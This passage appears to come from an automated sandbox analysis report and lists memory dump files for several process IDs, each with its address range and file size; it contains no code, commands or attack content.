        • memory/1424-12-0x00000000086B0000-0x00000000086C2000-memory.dmp

          Filesize

          72KB

        • memory/1424-5-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/1424-134-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/1424-13-0x00000000086D0000-0x000000000870C000-memory.dmp

          Filesize

          240KB

        • memory/1424-131-0x0000000007560000-0x0000000007570000-memory.dmp

          Filesize

          64KB

        • memory/1424-14-0x0000000008740000-0x000000000878C000-memory.dmp

          Filesize

          304KB

        • memory/1424-15-0x000000000AC70000-0x000000000ACD6000-memory.dmp

          Filesize

          408KB

        • memory/1424-16-0x0000000007560000-0x0000000007570000-memory.dmp

          Filesize

          64KB

        • memory/1424-17-0x000000000BE50000-0x000000000C012000-memory.dmp

          Filesize

          1.8MB

        • memory/1424-0-0x0000000000400000-0x0000000000448000-memory.dmp

          Filesize

          288KB

        • memory/1424-18-0x000000000C020000-0x000000000C54C000-memory.dmp

          Filesize

          5.2MB

        • memory/1424-19-0x0000000005C50000-0x0000000005CA0000-memory.dmp

          Filesize

          320KB

        • memory/1424-66-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/1424-1-0x0000000000560000-0x000000000059C000-memory.dmp

          Filesize

          240KB

        • memory/3728-128-0x0000000000FC0000-0x0000000000FCC000-memory.dmp

          Filesize

          48KB

        • memory/3728-247-0x0000000005A50000-0x0000000005A60000-memory.dmp

          Filesize

          64KB

        • memory/3728-246-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3728-315-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3728-133-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/4012-165-0x000002B784FE0000-0x000002B785020000-memory.dmp

          Filesize

          256KB

        • memory/4012-183-0x00007FFF005E0000-0x00007FFF0060B000-memory.dmp

          Filesize

          172KB

        • memory/4012-269-0x0000000000140000-0x0000000000218000-memory.dmp

          Filesize

          864KB

        • memory/4012-164-0x000002B784FE0000-0x000002B785020000-memory.dmp

          Filesize

          256KB

        • memory/4012-270-0x000002B784FE0000-0x000002B785020000-memory.dmp

          Filesize

          256KB

        • memory/4012-271-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/4012-174-0x00007FFEE4420000-0x00007FFEE44CA000-memory.dmp

          Filesize

          680KB

        • memory/4012-272-0x000002B79DC70000-0x000002B79DC80000-memory.dmp

          Filesize

          64KB

        • memory/4012-177-0x00007FFEFD090000-0x00007FFEFD0A2000-memory.dmp

          Filesize

          72KB

        • memory/4012-175-0x00007FFF00F80000-0x00007FFF0101E000-memory.dmp

          Filesize

          632KB

        • memory/4012-209-0x00007FFF01020000-0x00007FFF01075000-memory.dmp

          Filesize

          340KB

        • memory/4012-208-0x00007FFEE4420000-0x00007FFEE44CA000-memory.dmp

          Filesize

          680KB

        • memory/4012-180-0x00007FFEE4360000-0x00007FFEE441D000-memory.dmp

          Filesize

          756KB

        • memory/4012-181-0x00007FFF015A0000-0x00007FFF01741000-memory.dmp

          Filesize

          1.6MB

        • memory/4012-182-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/4012-207-0x00007FFEFFB80000-0x00007FFEFFED5000-memory.dmp

          Filesize

          3.3MB

        • memory/4012-184-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/4012-185-0x0000000000140000-0x0000000000218000-memory.dmp

          Filesize

          864KB

        • memory/4012-186-0x00007FFEE3430000-0x00007FFEE357E000-memory.dmp

          Filesize

          1.3MB

        • memory/4012-187-0x00007FFEFF330000-0x00007FFEFF357000-memory.dmp

          Filesize

          156KB

        • memory/4012-188-0x000002B79DC70000-0x000002B79DC80000-memory.dmp

          Filesize

          64KB

        • memory/4012-189-0x00007FFF00640000-0x00007FFF006AB000-memory.dmp

          Filesize

          428KB

        • memory/4012-199-0x00007FFF01A50000-0x00007FFF01C45000-memory.dmp

          Filesize

          2.0MB

        • memory/4012-200-0x00007FFEFF5F0000-0x00007FFEFF8B9000-memory.dmp

          Filesize

          2.8MB

        • memory/4012-201-0x00007FFF015A0000-0x00007FFF01741000-memory.dmp

          Filesize

          1.6MB

        • memory/4012-203-0x00007FFF00070000-0x00007FFF0011C000-memory.dmp

          Filesize

          688KB

        • memory/4012-204-0x00007FFF00F80000-0x00007FFF0101E000-memory.dmp

          Filesize

          632KB

        • memory/4012-206-0x00007FFEF2BE0000-0x00007FFEF2C45000-memory.dmp

          Filesize

          404KB

        • memory/4012-205-0x00007FFF00390000-0x00007FFF004BA000-memory.dmp

          Filesize

          1.2MB

        • memory/4868-153-0x0000000004810000-0x0000000004820000-memory.dmp

          Filesize

          64KB

        • memory/4868-179-0x0000000005D30000-0x0000000005D7C000-memory.dmp

          Filesize

          304KB

        • memory/4868-178-0x0000000005D10000-0x0000000005D2E000-memory.dmp

          Filesize

          120KB

        • memory/4868-219-0x0000000004810000-0x0000000004820000-memory.dmp

          Filesize

          64KB

        • memory/4868-220-0x000000007F4A0000-0x000000007F4B0000-memory.dmp

          Filesize

          64KB

        • memory/4868-221-0x00000000062F0000-0x0000000006322000-memory.dmp

          Filesize

          200KB

        • memory/4868-222-0x00000000756A0000-0x00000000756EC000-memory.dmp

          Filesize

          304KB

        • memory/4868-232-0x0000000006290000-0x00000000062AE000-memory.dmp

          Filesize

          120KB

        • memory/4868-233-0x0000000006F00000-0x0000000006FA3000-memory.dmp

          Filesize

          652KB

        • memory/4868-234-0x0000000007660000-0x0000000007CDA000-memory.dmp

          Filesize

          6.5MB

        • memory/4868-235-0x0000000007020000-0x000000000703A000-memory.dmp

          Filesize

          104KB

        • memory/4868-236-0x00000000070B0000-0x00000000070BA000-memory.dmp

          Filesize

          40KB

        • memory/4868-237-0x00000000072D0000-0x0000000007366000-memory.dmp

          Filesize

          600KB

        • memory/4868-238-0x0000000007230000-0x0000000007241000-memory.dmp

          Filesize

          68KB

        • memory/4868-239-0x0000000007260000-0x000000000726E000-memory.dmp

          Filesize

          56KB

        • memory/4868-240-0x0000000007270000-0x0000000007284000-memory.dmp

          Filesize

          80KB

        • memory/4868-241-0x0000000007370000-0x000000000738A000-memory.dmp

          Filesize

          104KB

        • memory/4868-242-0x00000000072B0000-0x00000000072B8000-memory.dmp

          Filesize

          32KB

        • memory/4868-245-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/4868-176-0x00000000058D0000-0x0000000005C24000-memory.dmp

          Filesize

          3.3MB

        • memory/4868-147-0x0000000004E50000-0x0000000005478000-memory.dmp

          Filesize

          6.2MB

        • memory/4868-170-0x0000000005780000-0x00000000057E6000-memory.dmp

          Filesize

          408KB

        • memory/4868-157-0x00000000055B0000-0x00000000055D2000-memory.dmp

          Filesize

          136KB

        • memory/4868-149-0x0000000074710000-0x0000000074EC0000-memory.dmp

          Filesize

          7.7MB

        • memory/4868-151-0x0000000004810000-0x0000000004820000-memory.dmp

          Filesize

          64KB

        • memory/4868-145-0x0000000004730000-0x0000000004766000-memory.dmp

          Filesize

          216KB